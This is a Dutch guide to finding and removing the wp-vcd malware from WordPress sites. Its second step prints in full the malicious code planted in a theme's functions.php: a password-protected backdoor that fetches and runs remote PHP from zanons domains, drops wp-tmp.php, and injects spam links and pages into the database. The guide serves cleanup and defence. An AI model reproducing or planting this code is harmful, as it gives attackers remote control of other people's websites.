Komen er bij jou ook irritante (reclame) meldingen in beeld bij het bezoeken van je WordPress website? en je hebt zelf geen popups toegevoegd aan de site? Dan is de kans groot dat je website Malware bevat. Hoe kom je hierachter en hoe verwijder je dit?

Het is van belang dat je website altijd een beveiligings- plugin bevat. Bijvoorbeeld de seucrity plugin; Wordfence. Download, installeer en activeer deze plugin. Scan je website met deze plugin op zwakheden, virussen en Malware. Malware gevonden? dan kun je deze via de plugin verwijderen. Echter is het probleem in de meeste gevallen niet opgelost. Hoe je dat kunt doen lees je verder.

Er bestaan meerdere soorten malware activiteiten. Malware komt in de meeste gevallen je website binnen door het installeren van onofficieel of niet goedgekeurde plugins. De meest voorkomende Malware is toch wel de wp-tmp.php, wp-vcd.php, wp-feed.php en wp-cd.php bestanden. Deze bestanden lijken op officiële WordPress bestanden, maar dit is niet het geval. Hieronder in het kort de uitleg hoe je de Malware definitief kunt verwijderen. Voordat je deze methode gaat proberen, altijd een back-up maken.

STAP 1
Verander (alle) wachtwoorden van je website. Denk hierbij aan je FTP, database en Admin login

STAP 2
Ga naar wp-content/themes/YOURTHEME/functions.php en open de functions.php van je actieve theme. De kans is groot dat hierin een code staat die betrekking heeft op je Malware. Deze code installeert namelijk automatisch de Malware bestanden waardoor ze blijven terug komen na verwijdering. Controleer ook inactieve themes en de child theme. De code moet worden verwijderd uit de function.php en is vergelijkbaar met onderstaande code:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'ac043657a4e80d5afcce1c523ad9e8c0'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle   = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle   = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='08b370e35d008b6591dd40b0eec23025';
if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent)); 
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent)); 
} elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent)); 
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?><?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '207025345d762fe3f77e7d5b3e5664a5'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}
print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
}
break;
case 'set_id_links';
if (isset($_REQUEST['data']))
{
$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
{
print "true";
}
}
break;
case 'create_page';
if (isset($_REQUEST['remove_page']))
{
if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
{
print "true";
}
}
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
{
if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
{
print "true";
}
}
break;
default: print "ERROR_WP_ACTION WP_URL_CD";
}
die("");
}
if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
if ($data -> full_content)
{
print stripslashes($data -> content);
}
else
{
print '<!DOCTYPE html>';
print '<html ';
language_attributes();
print ' class="no-js">';
print '<head>';
print '<title>'.stripslashes($data -> title).'</title>';
print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
print '<meta name="robots" content="index, follow" />';
print '<meta charset="';
bloginfo( 'charset' );
print '" />';
print '<meta name="viewport" content="width=device-width">';
print '<link rel="profile" href="http://gmpg.org/xfn/11">';
print '<link rel="pingback" href="';
bloginfo( 'pingback_url' );
print '">';
wp_head();
print '</head>';
print '<body>';
print '<div id="content" class="site-content">';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
}
exit;
}
?>


STAP 3
Optie 1
Verwijder de map ../wp-includes van je server en upload vervolgens een nieuwe ../wp-includes map terug. Deze kun je terugvinden in de WordPress installatie. De Nederlandse WordPress is hier te downloaden.

Optie 2 (minder veilig omdat de malware mogelijk ook in andere bestanden kan zitten)
Ga via je FTP naar de map ../wp-includes. Verwijder vervolgens de volgende bestanden uit de map.

  • wp-tmp.php
  • wp-vcd.php
  • wp-feed.php
  • wp-cd.php

STAP 4
Installeer de Wordfence (security) plugin als je dit nog niet gedaan hebt. Maak een nieuwe scan en bekijk het resultaat!